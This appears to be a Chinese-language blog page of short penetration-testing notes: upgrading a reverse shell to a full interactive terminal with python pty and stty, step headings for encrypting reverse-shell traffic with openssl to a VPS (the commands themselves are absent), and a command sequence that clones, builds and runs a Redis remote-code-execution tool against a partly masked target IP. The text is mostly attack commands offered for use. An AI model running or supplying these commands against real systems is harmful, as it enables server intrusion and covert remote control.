分类 内网渗透 下的文章

利用stty反弹一个交互shell & 加密反弹shell流量

stty 打印或更改terminal(终端)的设置
Linux stty 命令用法详解

流程:

先反弹一个shell出来
-w1206

# In reverse shell
$ python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl+Z

退出后在用stty修改tty通信
-w873

$ stty raw -echo #设置原始输入禁止回显,当您在键盘上输入时,并不出现在屏幕上
$ fg #返回shell中

-w756

-w650

$ reset
$ export SHELL=bash
export TERM=xterm-256color
stty rows 54 columns 104

第一步,在VPS 上生成 SSL 证书的公钥/私钥对:

第二步,VPS 监听反弹 shell:

第三步,目标上用 openssl 加密反弹 shell 的流量:

第四步,VPS 上成功获取加密的哑 shell:

https://www.4hou.com/technology/6248.html
https://www.freebuf.com/vuls/211847.html

redis-rce利用

  git clone https://github.com/Ridter/redis-rce.git
  git clone https://github.com/f1veT/RedisModules-ExecuteCommand.git
  cd RedisModules-ExecuteCommand/src/
    apt install gcc
    make
    ls
    cp module.so ../../redis-rce/
    cd ../../redis-rce/
    root@vultr:~/redis-rce# python redis-rce.py -r 116.xxx.138.81 -f module.so -L 136.xxx.86.xxx